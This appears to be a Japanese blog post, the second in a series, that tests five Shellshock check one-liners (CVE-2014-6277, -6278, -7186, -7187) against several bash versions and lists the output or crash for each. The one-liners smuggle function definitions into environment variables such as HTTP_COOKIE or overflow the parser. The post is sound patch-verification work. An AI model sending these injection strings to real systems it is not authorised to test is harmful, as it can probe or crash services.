Shellshockの検証用シェルスクリプトの動作について その２

前回、5種類の Shellshock のテストシェルスクリプトの動作を示しましたが、追加分の動作をまとめてみます。

6) (CVE-2014-6278)
x_func='() { echo vulnerable; }' bash -c x_func


・version 4.3.28
bash: x_func: command not found

・version 4.2.47
vulnerable

・version 4.3.25
vulnerable

・version 4.3.26
vulnerable

・version 4.3.27
bash43-27: x_func: command not found


7) (CVE-2014-6277、./test005-bad等はシェルスクリプトファイル名）
HTTP_COOKIE="() { x() { _; }; x() { _; } <<`perl -e '{print "A"x1000}'`; }" bash -c :

・version 4.3.28 (何も出力されない)

・version 4.2.47
./test005-bad: line 6: 4174 Segmentation fault HTTP_COOKIE="() { x() { _; }; x() { _; }

・version 4.3.25
./test005-bad25: line 7: 4179 Segmentation fault HTTP_COOKIE="() { x() { _; }; x() { _; }

・version 4.3.26
./test005-bad26: line 7: 4186 Segmentation fault HTTP_COOKIE="() { x() { _; }; x() { _; }

・version 4.3.27 (何も出力されない)



8) (CVE-2014-7187、4.3は問題ないようです。)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"


・version 4.3.28(何も出力されない)

・version 4.2.47(何も出力されない)

・version 4.3.25(何も出力されない）

・version 4.3.26(何も出力されない)

・version 4.3.27(何も出力されない）


9) (CVE-2014-6278)
x='() { _; } >_[$($())] { echo vulnerable; }' /usr/local/bin/bash -c "echo test"

・version 4.3.28
test

・version 4.2.47
vulnerable
test

・version 4.3.25
vulnerable
test

・version 4.3.26
vulnerable
test

・version 4.3.27
test


10) (CVE-2014-7186、test009-bad 等はシェルスクリプトファイル名)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

・version 4.3.28
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')
bash: warning: here-document at line 0 delimited by end-of-file (wanted `EOF')

・version 4.2.47
./test009-bad: line 7: 4300 Segmentation fault /bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'
CVE-2014-7186 vulnerable, redir_stack

・version 4.3.25
./test009-bad25: line 7: 4305 Segmentation fault bash43-25 -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'
CVE-2014-7186 vulnerable, redir_stack

・version 4.3.26
./test009-bad26: line 7: 4309 Segmentation fault bash43-26 -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'
CVE-2014-7186 vulnerable, redir_stack

・version 4.3.27
./test009-bad27: line 7: 4313 Segmentation fault bash43-27 -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'
CVE-2014-7186 vulnerable, redir_stack

10番目のテストが、bash 4.3.27 と bash 4.3.28 で動作が異なる場合です。4.3.27 までは Segmentation fault を起こしてしまいます。